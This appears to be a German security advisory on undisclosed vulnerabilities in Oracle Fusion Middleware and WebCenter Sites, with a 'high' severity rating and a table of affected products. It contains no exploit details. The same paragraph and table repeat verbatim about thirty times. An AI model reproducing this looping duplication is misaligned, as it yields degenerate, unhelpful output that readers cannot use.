In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
